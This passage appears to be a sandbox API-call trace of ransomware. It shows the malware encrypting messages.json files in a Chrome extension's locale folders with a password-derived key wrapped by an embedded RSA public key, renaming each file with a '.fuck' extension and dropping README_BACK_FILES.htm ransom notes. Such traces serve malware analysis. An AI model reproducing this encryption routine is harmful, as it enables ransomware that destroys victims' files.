"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\readme_back_files.htm")) returned 0xffffffff [0255.740] AreFileApisANSI () returned 1 [0255.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.740] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.741] GetFileType (hFile=0x5d50) returned 0x1 [0255.741] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.742] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.742] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.743] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.743] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.743] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.744] GetLastError () returned 0x0 [0255.744] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json")) returned 0x20 [0255.744] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0255.745] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.745] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.747] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.749] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.749] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.749] CryptHashData (hHash=0x2e180e8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.749] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.749] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.749] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.749] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12e60) returned 1 [0255.749] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12e60, dwCertEncodingType=0x1, pInfo=0x2e293a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e293d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e293d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19768) returned 1 [0255.750] CryptEncrypt (in: hKey=0x2e19768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.750] CryptEncrypt (in: hKey=0x2e19768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12f70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12f70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.750] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e12f70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12f70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.751] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x125, lpOverlapped=0x0) returned 1 [0255.752] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x125, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0255.752] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0255.752] CloseHandle (hObject=0x5d60) returned 1 [0255.752] CloseHandle (hObject=0x5d5c) returned 1 [0255.752] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0255.755] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0255.755] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.gsg")) returned 1 [0255.757] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.fuck")) returned 1 [0255.757] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0255.757] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.757] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.758] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.758] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.758] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0255.758] AreFileApisANSI () returned 1 [0255.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.758] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.758] GetFileType (hFile=0x5d50) returned 0x1 [0255.759] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.760] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.760] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.760] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.760] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.760] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.760] GetLastError () returned 0x0 [0255.760] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json")) returned 0x20 [0255.761] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0255.761] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.761] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.763] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.763] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.765] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.765] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.765] CryptHashData (hHash=0x2e18828, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.765] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.765] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.765] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.765] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13218) returned 1 [0255.766] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13218, dwCertEncodingType=0x1, pInfo=0x2e2a0a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a0d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a0d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19168) returned 1 [0255.766] CryptEncrypt (in: hKey=0x2e19168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.766] CryptEncrypt (in: hKey=0x2e19168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12ff8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12ff8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.766] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e12ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12ff8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.767] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcd, lpOverlapped=0x0) returned 1 [0255.768] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.768] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.768] CloseHandle (hObject=0x5d5c) returned 1 [0255.768] CloseHandle (hObject=0x5d60) returned 1 [0255.769] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0255.772] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0255.772] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0255.773] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0255.774] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.774] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.774] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.774] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.774] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.774] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0255.774] AreFileApisANSI () returned 1 [0255.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.775] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.775] GetFileType (hFile=0x5d50) returned 0x1 [0255.775] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.776] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.776] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.777] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.777] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.777] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.777] GetLastError () returned 0x0 [0255.778] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json")) returned 0x20 [0255.778] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0255.778] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.779] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 